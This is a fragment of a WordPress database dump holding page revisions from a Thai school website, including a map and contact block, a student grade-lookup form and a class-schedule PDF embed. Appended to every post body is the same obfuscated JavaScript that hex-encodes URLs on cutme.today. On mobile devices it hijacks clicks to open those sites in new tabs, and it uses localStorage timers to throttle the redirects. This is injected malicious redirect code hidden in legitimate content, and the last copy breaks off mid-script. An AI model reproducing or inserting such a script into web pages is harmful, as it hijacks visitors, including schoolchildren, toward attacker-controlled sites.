src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 21:12:43','2024-08-08 14:12:43','',14,'http://pakhaeng.ssk.in.th/?p=745',0,'revision','',0),
(747,1,'2024-08-08 21:13:45','2024-08-08 14:13:45','<!-- wp:html -->\n<div align=\'center\'><form action=\'https://a3301.obec.expert/services\' method=\'POST\' target=\'_blank\' > <div><input name=\'idcard\' style=\'text-align:center;\' type=\'text\' value=\'\' placeholder=\'เลขบัตร ปชช. 13 หลัก\' /></div> <div><input name=\'schoolid\' type=\'hidden\' value=\'33010169\' required /><button type=\'submit\'>ค้นหา</button></div> </form></div>\n<!-- /wp:html -->\n\n<!-- wp:paragraph -->\n<p>กรอกเลขบัตรประจำตัวประชาชนนักเรียน 13 หลัก เพื่อดูผลการเรียน</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ระบบดูเกรดออนไลน์','','inherit','closed','closed','','741-revision-v1','','','2024-08-08 21:13:45','2024-08-08 14:13:45','',741,'http://pakhaeng.ssk.in.th/?p=747',0,'revision','',0),
(748,1,'2024-08-08 21:21:05','2024-08-08 14:21:05','<!-- wp:file {\"id\":755,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ตารางเรียน-ตามรางสอน2567-2.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ตารางเรียน-ตามรางสอน2567-2.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ตารางเรียน-ตามรางสอน2567\"></object><a id=\"wp-block-file--media-8da32c11-7b9a-476e-b93e-06130d3f5607\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ตารางเรียน-ตามรางสอน2567-2.pdf\">ตารางเรียน-ตามรางสอน2567</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ตารางเรียน-ตามรางสอน2567-2.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-8da32c11-7b9a-476e-b93e-06130d3f5607\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2